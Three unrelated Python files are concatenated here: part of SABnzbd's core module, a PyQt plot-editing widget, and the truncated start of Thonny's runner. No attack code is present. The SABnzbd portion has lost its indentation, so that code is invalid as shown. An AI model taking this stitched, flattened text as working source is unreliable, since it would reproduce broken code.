cfg.https_key.callback(guard_restart)
cfg.enable_https.callback(guard_restart)
cfg.top_only.callback(guard_top_only)
cfg.pause_on_post_processing.callback(guard_pause_on_pp)
cfg.quota_size.callback(guard_quota_size)
cfg.quota_day.callback(guard_quota_dp)
cfg.quota_period.callback(guard_quota_dp)
cfg.language.callback(guard_language)
cfg.enable_https_verification.callback(guard_https_ver)
guard_https_ver()
# Set cache limit
if not cfg.cache_limit() or (cfg.cache_limit() in ("200M", "450M") and (sabnzbd.WIN32 or sabnzbd.DARWIN)):
cfg.cache_limit.set(misc.get_cache_limit())
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
check_incomplete_vs_complete()
# Set language files
lang.set_locale_info("SABnzbd", DIR_LANGUAGE)
lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
# One time conversion "speedlimit" in schedules.
if not cfg.sched_converted():
schedules = cfg.schedules()
newsched = []
for sched in schedules:
if "speedlimit" in sched:
newsched.append(re.sub(r"(speedlimit \d+)$", r"\1K", sched))
else:
newsched.append(sched)
cfg.schedules.set(newsched)
cfg.sched_converted.set(1)
# Second time schedule conversion
if cfg.sched_converted() != 2:
cfg.schedules.set(["%s %s" % (1, schedule) for schedule in cfg.schedules()])
cfg.sched_converted.set(2)
config.save_config()
# Convert auto-sort
if cfg.auto_sort() == "0":
cfg.auto_sort.set("")
elif cfg.auto_sort() == "1":
cfg.auto_sort.set("avg_age asc")
# Add hostname to the whitelist
if not cfg.host_whitelist():
cfg.host_whitelist.set(socket.gethostname())
# Do repair if requested
if check_repair_request():
repair = 2
pause_downloader = True
# Initialize threads
rss.init()
paused = BPSMeter.do.read()
NzbQueue()
Downloader(pause_downloader or paused)
Decoder()
Assembler()
PostProcessor()
NzbQueue.do.read_queue(repair)
DirScanner()
Rating()
URLGrabber()
scheduler.init()
if evalSched:
scheduler.analyse(pause_downloader)
logging.info("All processes started")
RESTART_REQ = False
__INITIALIZED__ = True
return True
@synchronized(INIT_LOCK)
def start():
global __INITIALIZED__
if __INITIALIZED__:
logging.debug("Starting postprocessor")
PostProcessor.do.start()
logging.debug("Starting assembler")
Assembler.do.start()
logging.debug("Starting downloader")
Downloader.do.start()
logging.debug("Starting decoders")
Decoder.do.start()
scheduler.start()
logging.debug("Starting dirscanner")
DirScanner.do.start()
Rating.do.start()
logging.debug("Starting urlgrabber")
URLGrabber.do.start()
@synchronized(INIT_LOCK)
def halt():
global __INITIALIZED__, __SHUTTING_DOWN__
if __INITIALIZED__:
logging.info("SABnzbd shutting down...")
__SHUTTING_DOWN__ = True
# Stop the windows tray icon
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
sabnzbd.zconfig.remove_server()
sabnzbd.directunpacker.abort_all()
rss.stop()
logging.debug("Stopping URLGrabber")
URLGrabber.do.stop()
try:
URLGrabber.do.join()
except:
pass
logging.debug("Stopping rating")
Rating.do.stop()
try:
Rating.do.join()
except:
pass
logging.debug("Stopping dirscanner")
DirScanner.do.stop()
try:
DirScanner.do.join()
except:
pass
# Stop Required Objects
logging.debug("Stopping downloader")
sabnzbd.downloader.stop()
# Decoder handles join gracefully
logging.debug("Stopping decoders")
Decoder.do.stop()
Decoder.do.join()
logging.debug("Stopping assembler")
Assembler.do.stop()
try:
Assembler.do.join()
except:
pass
logging.debug("Stopping postprocessor")
PostProcessor.do.stop()
try:
PostProcessor.do.join()
except:
pass
# Save State
try:
save_state()
except:
logging.error(T("Fatal error at saving state"), exc_info=True)
# The Scheduler cannot be stopped when the stop was scheduled.
        # Since all warm-restarts have been removed, it's no longer
# needed to stop the scheduler.
# We must tell the scheduler to deactivate.
scheduler.abort()
logging.info("All processes stopped")
__INITIALIZED__ = False
def trigger_restart(timeout=None):
""" Trigger a restart by setting a flag an shutting down CP """
# Sometimes we need to wait a bit to send good-bye to the browser
if timeout:
time.sleep(timeout)
# Add extra arguments
if sabnzbd.downloader.Downloader.do.paused:
sabnzbd.RESTART_ARGS.append("-p")
sys.argv = sabnzbd.RESTART_ARGS
# Stop all services
sabnzbd.halt()
cherrypy.engine.exit()
if sabnzbd.WIN32:
# Remove connection info for faster restart
del_connection_info()
# Leave the harder restarts to the polling in SABnzbd.py
if hasattr(sys, "frozen"):
sabnzbd.TRIGGER_RESTART = True
else:
# Do the restart right now
cherrypy.engine._do_execv()
##############################################################################
# Misc Wrappers
##############################################################################
def new_limit():
""" Callback for article cache changes """
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
def guard_restart():
""" Callback for config options requiring a restart """
global RESTART_REQ
sabnzbd.RESTART_REQ = True
def guard_top_only():
""" Callback for change of top_only option """
NzbQueue.do.set_top_only(cfg.top_only())
def guard_pause_on_pp():
""" Callback for change of pause-download-on-pp """
if cfg.pause_on_post_processing():
pass # Not safe to idle downloader, because we don't know
# if post-processing is active now
else:
Downloader.do.resume_from_postproc()
def guard_quota_size():
""" Callback for change of quota_size """
BPSMeter.do.change_quota()
def guard_quota_dp():
""" Callback for change of quota_day or quota_period """
scheduler.restart(force=True)
def guard_language():
""" Callback for change of the interface language """
sabnzbd.lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
def set_https_verification(value):
""" Set HTTPS-verification state while returning current setting
False = disable verification
"""
prev = ssl._create_default_https_context == ssl.create_default_context
if value:
ssl._create_default_https_context = ssl.create_default_context
else:
ssl._create_default_https_context = ssl._create_unverified_context
return prev
def guard_https_ver():
""" Callback for change of https verification """
set_https_verification(cfg.enable_https_verification())
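# Illustrative note, not part of SABnzbd's public API surface: because set_https_verification()
# swaps Python's default HTTPS context factory and returns the previous state, callers can
# temporarily relax certificate checking and then restore it, e.g.:
#     previous = set_https_verification(False)
#     ... talk to a host with a self-signed certificate ...
#     set_https_verification(previous)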
def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None):
""" Add NZB based on a URL, attributes optional """
if "http" not in url:
return
if not pp or pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
logging.info("Fetching %s", url)
# Add feed name if it came from RSS
msg = T("Trying to fetch NZB from %s") % url
if nzbname:
msg = "%s - %s" % (nzbname, msg)
# Generate the placeholder
future_nzo = NzbQueue.do.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname)
URLGrabber.do.add(url, future_nzo)
return future_nzo.nzo_id
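# Illustrative example (the URL is a placeholder): add_url("https://example.org/some.nzb")
# creates a "Trying to fetch NZB from ..." placeholder job, hands the URL to URLGrabber and
# returns the nzo_id of that future job.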
def save_state():
""" Save all internal bookkeeping to disk """
ArticleCache.do.flush_articles()
NzbQueue.do.save()
BPSMeter.do.save()
rss.save()
Rating.do.save()
DirScanner.do.save()
PostProcessor.do.save()
def pause_all():
""" Pause all activities than cause disk access """
global PAUSED_ALL
PAUSED_ALL = True
Downloader.do.pause()
logging.debug("PAUSED_ALL active")
def unpause_all():
""" Resume all activities """
global PAUSED_ALL
PAUSED_ALL = False
Downloader.do.resume()
logging.debug("PAUSED_ALL inactive")
##############################################################################
# NZB Saving Methods
##############################################################################
def backup_exists(filename):
""" Return True if backup exists and no_dupes is set """
path = cfg.nzb_backup_dir.get_path()
return path and os.path.exists(os.path.join(path, filename + ".gz"))
def backup_nzb(filename, data):
""" Backup NZB file """
path = cfg.nzb_backup_dir.get_path()
if path:
save_compressed(path, filename, data)
def save_compressed(folder, filename, data):
""" Save compressed NZB file in folder """
if filename.endswith(".nzb"):
filename += ".gz"
else:
filename += ".nzb.gz"
logging.info("Backing up %s", os.path.join(folder, filename))
try:
# Have to get around the path being put inside the tgz
with open(os.path.join(folder, filename), "wb") as tgz_file:
f = gzip.GzipFile(filename, fileobj=tgz_file)
f.write(encoding.utob(data))
f.flush()
f.close()
except:
logging.error(T("Saving %s failed"), os.path.join(folder, filename))
logging.info("Traceback: ", exc_info=True)
##############################################################################
# Unsynchronized methods
##############################################################################
def add_nzbfile(
nzbfile,
pp=None,
script=None,
cat=None,
catdir=None,
priority=NORMAL_PRIORITY,
nzbname=None,
nzo_info=None,
url=None,
keep=None,
reuse=None,
password=None,
nzo_id=None,
):
""" Add file, either a single NZB-file or an archive.
All other parameters are passed to the NZO-creation.
"""
if pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
if isinstance(nzbfile, str):
# File coming from queue repair or local file-path
path = nzbfile
filename = os.path.basename(path)
keep_default = True
if not sabnzbd.WIN32:
# If windows client sends file to Unix server backslashes may
# be included, so convert these
path = path.replace("\\", "/")
logging.info("Attempting to add %s [%s]", filename, path)
else:
# File from file-upload object
# CherryPy mangles unicode-filenames: https://github.com/cherrypy/cherrypy/issues/1766
filename = encoding.correct_unknown_encoding(nzbfile.filename)
logging.info("Attempting to add %s", filename)
keep_default = False
try:
# We have to create a copy, because we can't re-use the CherryPy temp-file
# Just to be sure we add the extension to detect file type later on
nzb_temp_file, path = tempfile.mkstemp(suffix=filesystem.get_ext(filename))
os.write(nzb_temp_file, nzbfile.file.read())
os.close(nzb_temp_file)
except OSError:
logging.error(T("Cannot create temp file for %s"), filename)
logging.info("Traceback: ", exc_info=True)
return None
# Externally defined if we should keep the file?
if keep is None:
keep = keep_default
if filesystem.get_ext(filename) in VALID_ARCHIVES:
return nzbparser.process_nzb_archive_file(
filename,
path=path,
pp=pp,
script=script,
cat=cat,
catdir=catdir,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
nzo_info=nzo_info,
url=url,
password=password,
nzo_id=nzo_id,
)
else:
return nzbparser.process_single_nzb(
filename,
path=path,
pp=pp,
script=script,
cat=cat,
catdir=catdir,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
nzo_info=nzo_info,
url=url,
password=password,
nzo_id=nzo_id,
)
def enable_server(server):
""" Enable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(1)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def disable_server(server):
""" Disable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(0)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def system_shutdown():
""" Shutdown system after halting download and saving bookkeeping """
logging.info("Performing system shutdown")
Thread(target=halt).start()
while __INITIALIZED__:
time.sleep(1.0)
if sabnzbd.WIN32:
powersup.win_shutdown()
elif DARWIN:
powersup.osx_shutdown()
else:
powersup.linux_shutdown()
def system_hibernate():
""" Hibernate system """
logging.info("Performing system hybernation")
if sabnzbd.WIN32:
powersup.win_hibernate()
elif DARWIN:
powersup.osx_hibernate()
else:
powersup.linux_hibernate()
def system_standby():
""" Standby system """
logging.info("Performing system standby")
if sabnzbd.WIN32:
powersup.win_standby()
elif DARWIN:
powersup.osx_standby()
else:
powersup.linux_standby()
def shutdown_program():
""" Stop program after halting and saving """
if not sabnzbd.SABSTOP:
logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name())
sabnzbd.halt()
cherrypy.engine.exit()
sabnzbd.SABSTOP = True
def restart_program():
""" Restart program (used by scheduler) """
logging.info("Scheduled restart request")
# Just set the stop flag, because stopping CherryPy from
# the scheduler is not reliable
sabnzbd.TRIGGER_RESTART = True
def change_queue_complete_action(action, new=True):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
When "new" is False, check whether non-script actions are acceptable
"""
global QUEUECOMPLETE, QUEUECOMPLETEACTION, QUEUECOMPLETEARG
_action = None
_argument = None
if "script_" in action:
# all scripts are labeled script_xxx
_action = run_script
_argument = action.replace("script_", "")
elif new or cfg.queue_complete_pers.get():
if action == "shutdown_pc":
_action = system_shutdown
elif action == "hibernate_pc":
_action = system_hibernate
elif action == "standby_pc":
_action = system_standby
elif action == "shutdown_program":
_action = shutdown_program
else:
action = None
else:
action = None
if new:
cfg.queue_complete.set(action or "")
config.save_config()
# keep the name of the action for matching the current select in queue.tmpl
QUEUECOMPLETE = action
QUEUECOMPLETEACTION = _action
QUEUECOMPLETEARG = _argument
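# Illustrative examples: change_queue_complete_action("script_cleanup.py") registers run_script
# with the argument "cleanup.py", "shutdown_pc" maps to system_shutdown, and an unrecognised
# action clears the end-of-queue action again.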
def run_script(script):
""" Run a user script (queue complete only) """
command = [os.path.join(cfg.script_dir.get_path(), script)]
if os.path.exists(command[0]):
try:
stup, need_shell, command, creationflags = sabnzbd.newsunpack.build_command(command)
logging.info("Spawning external command %s", command)
subprocess.Popen(
command,
shell=need_shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=stup,
creationflags=creationflags,
)
except:
logging.debug("Failed script %s, Traceback: ", script, exc_info=True)
def empty_queues():
""" Return True if queues empty or non-existent """
global __INITIALIZED__
return (not __INITIALIZED__) or (PostProcessor.do.empty() and NzbQueue.do.is_empty())
def keep_awake():
""" If we still have work to do, keep Windows/OSX system awake """
if KERNEL32 or FOUNDATION:
if sabnzbd.cfg.keep_awake():
ES_CONTINUOUS = 0x80000000
ES_SYSTEM_REQUIRED = 0x00000001
if (not Downloader.do.is_paused() and not NzbQueue.do.is_empty()) or (
not PostProcessor.do.paused and not PostProcessor.do.empty()
):
if KERNEL32:
# Set ES_SYSTEM_REQUIRED until the next call
KERNEL32.SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED)
else:
sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing")
else:
if KERNEL32:
# Allow the regular state again
KERNEL32.SetThreadExecutionState(ES_CONTINUOUS)
else:
sleepless.allow_sleep()
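# Note on the Windows branch above: SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED)
# keeps the system (not the display) awake until the next call, and calling it again with only
# ES_CONTINUOUS clears that request, which is what the idle branch does.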
################################################################################
# Data IO #
################################################################################
def get_new_id(prefix, folder, check_list=None):
""" Return unique prefixed admin identifier within folder
optionally making sure that id is not in the check_list.
"""
for n in range(100):
try:
if not os.path.exists(folder):
os.makedirs(folder)
fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder)
os.close(fd)
head, tail = os.path.split(path)
if not check_list or tail not in check_list:
return tail
except:
logging.error(T("Failure in tempfile.mkstemp"))
logging.info("Traceback: ", exc_info=True)
break
# Cannot create unique id, crash the process
raise IOError
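# Illustrative example: get_new_id("nzo", cfg.admin_dir.get_path()) creates an empty file via
# tempfile.mkstemp and returns just its basename (something like "SABnzbd_nzo_xxxxxx"), which
# callers can then reuse as the file name for save_data()/load_data() in the admin folder.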
def save_data(data, _id, path, do_pickle=True, silent=False):
""" Save data to a diskfile """
if not silent:
logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path)
path = os.path.join(path, _id)
# We try 3 times, to avoid any dict or access problems
for t in range(3):
try:
with open(path, "wb") as data_file:
if do_pickle:
pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL)
else:
data_file.write(data)
break
except:
if silent:
# This can happen, probably a removed folder
pass
elif t == 2:
logging.error(T("Saving %s failed"), path)
logging.info("Traceback: ", exc_info=True)
else:
# Wait a tiny bit before trying again
time.sleep(0.1)
def load_data(data_id, path, remove=True, do_pickle=True, silent=False):
""" Read data from disk file """
path = os.path.join(path, data_id)
if not os.path.exists(path):
logging.info("[%s] %s missing", misc.caller_name(), path)
return None
if not silent:
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path)
try:
with open(path, "rb") as data_file:
if do_pickle:
try:
data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE)
except UnicodeDecodeError:
# Could be Python 2 data that we can load using old encoding
data = pickle.load(data_file, encoding="latin1")
else:
data = data_file.read()
if remove:
filesystem.remove_file(path)
except:
logging.error(T("Loading %s failed"), path)
logging.info("Traceback: ", exc_info=True)
return None
return data
def remove_data(_id, path):
""" Remove admin file """
path = os.path.join(path, _id)
try:
if os.path.exists(path):
filesystem.remove_file(path)
except:
logging.debug("Failed to remove %s", path)
def save_admin(data, data_id):
""" Save data in admin folder in specified format """
logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id)
save_data(data, data_id, cfg.admin_dir.get_path())
def load_admin(data_id, remove=False, silent=False):
""" Read data in admin folder in specified format """
logging.debug("[%s] Loading data for %s", misc.caller_name(), data_id)
return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent)
def request_repair():
""" Request a full repair on next restart """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
try:
with open(path, "w") as f:
f.write("\n")
except:
pass
def check_repair_request():
""" Return True if repair request found, remove afterwards """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
if os.path.exists(path):
try:
filesystem.remove_file(path)
except:
pass
return True
return False
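# Illustrative note: request_repair() simply drops a REPAIR_REQUEST marker file in the admin
# folder; check_repair_request() consumes it on the next startup, which makes initialize()
# force a full queue repair (repair level 2) with the downloader paused.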
def check_all_tasks():
""" Check every task and restart safe ones, else restart program
Return True when everything is under control
"""
if __SHUTTING_DOWN__ or not __INITIALIZED__:
return True
# Non-restartable threads, require program restart
if not sabnzbd.PostProcessor.do.is_alive():
logging.info("Restarting because of crashed postprocessor")
return False
if not Downloader.do.is_alive():
logging.info("Restarting because of crashed downloader")
return False
if not Decoder.do.is_alive():
logging.info("Restarting because of crashed decoder")
return False
if not Assembler.do.is_alive():
logging.info("Restarting because of crashed assembler")
return False
# Kick the downloader, in case it missed the semaphore
Downloader.do.wakeup()
# Make sure the right servers are active
Downloader.do.check_timers()
# Restartable threads
if not DirScanner.do.is_alive():
logging.info("Restarting crashed dirscanner")
DirScanner.do.__init__()
if not URLGrabber.do.is_alive():
logging.info("Restarting crashed urlgrabber")
URLGrabber.do.__init__()
if not Rating.do.is_alive():
logging.info("Restarting crashed rating")
Rating.do.__init__()
if not sabnzbd.scheduler.sched_check():
logging.info("Restarting crashed scheduler")
sabnzbd.scheduler.init()
sabnzbd.downloader.Downloader.do.unblock_all()
# Check one-shot pause
sabnzbd.scheduler.pause_check()
# Check (and terminate) idle jobs
sabnzbd.nzbqueue.NzbQueue.do.stop_idle_jobs()
return True
def pid_file(pid_path=None, pid_file=None, port=0):
""" Create or remove pid file """
global DIR_PID
if not sabnzbd.WIN32:
if pid_path and pid_path.startswith("/"):
DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port)
elif pid_file and pid_file.startswith("/"):
DIR_PID = pid_file
if DIR_PID:
try:
if port:
with open(DIR_PID, "w") as f:
f.write("%d\n" % os.getpid())
else:
filesystem.remove_file(DIR_PID)
except:
logging.warning("Cannot access PID file %s", DIR_PID)
def check_incomplete_vs_complete():
""" Make sure "incomplete" and "complete" are not identical """
complete = cfg.complete_dir.get_path()
if filesystem.same_file(cfg.download_dir.get_path(), complete):
if filesystem.real_path("X", cfg.download_dir()) == cfg.download_dir():
# Abs path, so set an abs path too
cfg.download_dir.set(os.path.join(complete, "incomplete"))
else:
cfg.download_dir.set("incomplete")
def wait_for_download_folder():
""" Wait for download folder to become available """
while not cfg.download_dir.test_path():
logging.debug('Waiting for "incomplete" folder')
time.sleep(2.0)
# Required wrapper because nzbstuff.py cannot import downloader.py
def highest_server(me):
return sabnzbd.downloader.Downloader.do.highest_server(me)
def test_ipv6():
""" Check if external IPv6 addresses are reachable """
if not cfg.selftest_host():
# User disabled the test, assume active IPv6
return True
try:
info = getipaddress.addresslookup6(cfg.selftest_host())
except:
logging.debug(
"Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0]
)
return False
try:
af, socktype, proto, canonname, sa = info[0]
with socket.socket(af, socktype, proto) as sock:
sock.settimeout(2) # 2 second timeout
sock.connect(sa[0:2])
logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6")
return True
except socket.error:
logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6")
return False
except:
logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0])
return False
def test_cert_checking():
""" Test quality of certificate validation """
# User disabled the test, assume proper SSL certificates
if not cfg.selftest_host():
return True
# Try a connection to our test-host
try:
ctx = ssl.create_default_context()
base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host())
ssl_sock.settimeout(2.0)
ssl_sock.connect((cfg.selftest_host(), 443))
ssl_sock.close()
return True
except (socket.gaierror, socket.timeout):
# Non-SSL related error.
# We now assume that certificates work instead of forcing
        # lower quality just because of some (temporary) internet problem
logging.info("Could not determine system certificate validation quality due to connection problems")
return True
except:
# Seems something is still wrong
sabnzbd.set_https_verification(False)
return False
def history_updated():
""" To make sure we always have a fresh history """
sabnzbd.LAST_HISTORY_UPDATE += 1
# Never go over the limit
if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize:
sabnzbd.LAST_HISTORY_UPDATE = 1
|
edit.py
|
"""The module that contains the plot edit partent widget."""
import logging
import threading
from matplotlib import pyplot as plt
from PyQt5.QtWidgets import (QComboBox, QHBoxLayout, QPushButton, QVBoxLayout,
QWidget)
from views.plot import Plot
log = logging.getLogger(__name__)
class PlotEdit(QWidget):
"""
Class that builds the parent plot editing widget.
"""
def __init__(self, plot_window=None):
super().__init__()
self.left = 150
self.top = 150
self.width = 1080
self.height = 720
self.line_box = QComboBox()
self.select_plot()
self.init_ui()
        self.check_for_plots_thread = threading.Thread(target=self.check_for_plots)  # pass the callable, don't call it here
self.check_for_plots_thread.daemon = True
self.check_for_plots_thread.start()
def init_ui(self):
"""Initialize the Edit Widget"""
plot_window_button = QPushButton('Select Plot Window', self)
plot_window_button.clicked.connect(self.select_plot)
plot_button = QPushButton('Plot Data', self)
plot_button.clicked.connect(self.plot)
color_button = QPushButton('Change Color', self)
color_button.clicked.connect(lambda: self.plot_window.color_change(self.line_box))
style_button = QPushButton('Change Style', self)
style_button.clicked.connect(lambda: self.plot_window.line_style_change(self.line_box))
remove_button = QPushButton('Remove Plot', self)
remove_button.clicked.connect(lambda: self.plot_window.remove_plot(self.line_box))
button_vertical_box = QVBoxLayout()
button_vertical_box.addWidget(self.line_box)
button_vertical_box.addStretch(1)
button_vertical_box.addWidget(plot_window_button)
button_vertical_box.addWidget(color_button)
button_vertical_box.addWidget(style_button)
button_vertical_box.addWidget(plot_button)
button_vertical_box.addWidget(remove_button)
main_horizontal_box = QHBoxLayout()
main_horizontal_box.addLayout(button_vertical_box)
self.setLayout(main_horizontal_box)
self.setGeometry(self.left, self.top, self.width, self.height)
def check_for_plots(self):
open_plots = Plot.get_plot_instances()
for plot in open_plots:
self.line_box.addItem(plot)
def get_line_box(self):
"""Returns the combo box for referencing the currently selected line."""
return self.line_box
def select_plot(self):
"""Function to select the plot to modify."""
open_plots = Plot.get_plot_instances()
log.warning("select_plot called.")
if not open_plots:
#No Open Plots: Create a new one
pass
elif len(open_plots) == 1:
#Only one plot open, pick that one
self.plot_window = open_plots[0]
else:
            # Multiple plots open, handle that case.
pass
def plot(self):
"""Wrapper around the plot function in the Plot class."""
self.plot_window.plot(self.get_line_box())
self.plot_window.show()
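# Minimal usage sketch (assumption: a running QApplication and the views.plot.Plot class are
# available; this widget is normally embedded in a larger window):
#     import sys
#     from PyQt5.QtWidgets import QApplication
#     app = QApplication(sys.argv)
#     editor = PlotEdit()
#     editor.show()
#     sys.exit(app.exec_())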
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
from logging import getLogger
import os.path
import re
import shlex
import signal
import subprocess
import traceback
import sys
import time
import tkinter as tk
import warnings
from logging import debug
from threading import Thread
from time import sleep
from tkinter import messagebox, ttk
from typing import Any, List, Optional, Set, Union, Callable # @UnusedImport; @UnusedImport
import thonny
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
EOFCommand,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
is_same_path,
normpath_with_actual_case,
parse_message,
path_startswith,
serialize_message,
update_system_path,
MessageFromBackend,
universal_relpath,
read_one_incoming_message_str,
InlineResponse,
)
from thonny.editors import (
get_current_breakpoints,
get_saved_current_script_filename,
is_remote_path,
is_local_path,
get_target_dirname_from_editor_filename,
extract_target_path,
)
from thonny.languages import tr
from thonny.misc_utils import (
construct_cmd_line,
inside_flatpak,
running_on_mac_os,
running_on_windows,
show_command_not_available_in_flatpak_message,
)
from thonny.ui_utils import CommonDialogEx, select_sequence, show_dialog
from thonny.workdlg import WorkDialog
logger = getLogger(__name__)
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = "" # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
EXPECTED_TERMINATION_CODE = 123
INTERRUPT_SEQUENCE = "<Control-c>"
ANSI_CODE_TERMINATOR = re.compile("[@-~]")
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
_console_allocated = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: BackendProxy
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
import shutil
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
global _console_allocated
try:
self._check_alloc_console()
_console_allocated = True
except Exception:
logger.exception("Problem allocating console")
_console_allocated = False
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
RUN_COMMAND_LABEL = tr("Run current script")
RUN_COMMAND_CAPTION = tr("Run")
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
try:
import thonny.plugins.debugger # @UnusedImport
debugger_available = True
except ImportError:
debugger_available = False
get_workbench().add_command(
"run_current_script",
"run",
RUN_COMMAND_LABEL,
caption=RUN_COMMAND_CAPTION,
handler=self.cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self.cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
tr("Run current script in terminal"),
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
tr("Stop/Restart backend"),
caption=tr("Stop"),
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=100,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
tr("Interrupt execution"),
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence=INTERRUPT_SEQUENCE,
skip_sequence_binding=True, # Sequence will be bound differently
group=100,
bell_when_denied=False,
)
get_workbench().bind(INTERRUPT_SEQUENCE, self._cmd_interrupt_with_shortcut, True)
get_workbench().add_command(
"ctrld",
"run",
tr("Send EOF / Soft reboot"),
self.ctrld,
self.ctrld_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"disconnect",
"run",
tr("Disconnect"),
self.disconnect,
self.disconnect_enabled,
group=100,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command" """
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logger.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logger.warning("RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state()))
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
if "id" not in cmd:
cmd["id"] = generate_command_id()
cmd["local_cwd"] = get_workbench().get_local_cwd()
if self._proxy.running_inline_command and isinstance(cmd, InlineCommand):
self._postpone_command(cmd)
return
# Offer the command
logger.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return None
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, InlineCommand):
self._proxy.running_inline_command = True
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
# This may be only logical restart, which does not look like restart to the runner
get_workbench().event_generate("BackendRestart", full=False)
def send_command_and_wait(self, cmd: CommandToBackend, dialog_title: str) -> MessageFromBackend:
